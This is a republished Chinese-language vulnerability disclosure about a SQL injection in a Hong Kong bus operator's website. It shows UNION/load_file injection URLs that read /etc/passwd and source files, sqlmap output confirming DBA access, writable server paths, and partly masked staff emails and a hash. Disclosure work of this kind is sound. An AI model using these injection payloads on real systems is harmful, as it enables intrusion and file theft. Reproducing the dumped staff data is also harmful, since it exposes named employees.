神刀安全网

漏洞标题: 香港某大公共交通營運商主網SQL注入/DBA权限導致任意文件下载(香港地區)

漏洞详情

披露状态:

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-31: 厂商已经确认,细节仅向厂商公开
2016-04-10: 细节向核心白帽子及相关领域专家公开
2016-04-20: 细节向普通白帽子公开
2016-04-29: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

香港某大公共交通營運商主網SQL注入/DBA权限導致任意文件下载

详细说明:

DBA權限應該足夠修改主網上的巴士路線/新聞等資料,

還有數千條顧客聯絡資料,

還有cms的密碼等等等等..

九龍巴士(一九三三)有限公司(簡稱九巴;英語:The Kowloon Motor Bus Co. (1933) Ltd.,縮寫:KMB)為載通國際控股有限公司旗下,是香港首間專營公共巴士業務的公司,於1933年成立;主要經營九龍及新界的專利巴士服務,現經營394條巴士路線及共有4,080部巴士,當中3,890部雙層及單層巴士,190部是龍運巴士車隊,是香港最大的巴士公司。2014年會計年度日平均載客量為261.7萬人次。

龍運巴士有限公司,是香港其中一家專利巴士公司,為九龍巴士的子公司(所有巴士車身上有「九巴集團」字樣),由載通國際控股有限公司全資擁有,主要服務香港國際機場及東涌來往新界區(不包括將軍澳)。

受影響網站(九巴,龍運,載通)在同一Azure主機上..

code 区域
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**

UNION SQL注入 LOAD_FILE 讀取文件

code 区域
http://**.**.**.**/chi/map.php?file=HO06-S-1250-' union select 1,2,3,4,55,load_file('/etc/passwd'),7,8,9,10,11,12,13,14,15,16 %23
http://**.**.**.**/chi/map.php?file=HO06-S-1250-' union select 1,2,3,4,55,load_file('/home/webmaster/public_html/chi/map.php'),7,8,9,10,11,12,13,14,15,16 %23
http://**.**.**.**/chi/map.php?file=HO06-S-1250-' union select 1,2,3,4,55,load_file('­­­­/home/webmaster/tih/chinese.php'),7,8,9,10,11,12,13,14,15,16 %23

DBA權限,有些可寫入的路徑

code 区域
/var/ftp/virtual_users/csform/
/var/ftp/virtual_users/kmfileuser/
/var/ftp/virtual_users/refunduser/
/tmp/

漏洞证明:

code 区域
Parameter: file (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns (custom)
Payload: file=-1419' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a706271,0x497955634b6752684979,0x716b6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: Apache
back-end DBMS: MySQL 5
current user: 'kmb@%'
current user is DBA: True

Database:

mask 区域
*****cm*****
*****---------------*****
***** *****
*****---------------*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****---------------*****
***** long*****
*****---------------*****
***** *****
*****---------------*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****---------------*****

把手機拿掉

code 区域

mask 区域
*****e: k*****
*****tbl_*****
*****ntr*****
*****+------------+-----------------+-----------------------+----*****
*****| created_by | user_title | user_email | cre*****
*****+------------+-----------------+-----------------------+----*****
***** | <blank> | <blank> *****
***** | <blank> | <blank> | 201*****
***** 1 | Auction Auditor | alex.leung@**.**.**.** | *****
*****0 | Webmaster | webmaster@**.**.**.** | 2*****
*****1 | Auction Editor | alex.leung@**.**.**.** | 2*****
*****| 0 | Administrator | info@**.**.**.** | 20*****
***** | <blank> | <blank> | 201*****
***** | 1 | Officer | christy.mo@**.**.**.** *****
*****0 | Webmaster | alex.leung@**.**.**.** | 2*****
*****| 1 | test | test | 200*****
***** | <blank> | brain.cheung@**.**.**.** *****
***** | <blank> | christine.wong@**.**.**.** *****
***** | <blank> | <blank> | 201*****
*****| 0 | AI Admin | arthur@**.**.**.** | 20*****
***** | <blank> | <blank> *****
*****| 1 | test | test | 200*****
*****| 1 | tester | test@**.**.**.** | 20*****
***** | <blank> | <blank> | 201*****
***** | <blank> | <blank> | *****
*****1 | CSB | csbalert@**.**.**.** | 2*****
*****+------------+-----------------+-----------------------+----*****
**********
***** long*****
*****tbl_*****
*****try*****
*****+------------+---------------+------------------+-------*****
*****| created_by | user_title | user_email | create*****
*****+------------+---------------+------------------+-------*****
*****| 0 | Administrator | info@**.**.**.** | 2014-*****
*****--+------------+---------------+------------------+----*****

mask 区域
*****e: k*****
*****: a*****
*****try*****
*****--------------*****
***** *****
*****--------------*****
*****d61d8327deb882*****
*****--------------*****

cms應該在cms.**.**.**.**吧,不過有密碼的

修复方案:

上WAF

改密碼

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 香港某大公共交通營運商主網SQL注入/DBA权限導致任意文件下载(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址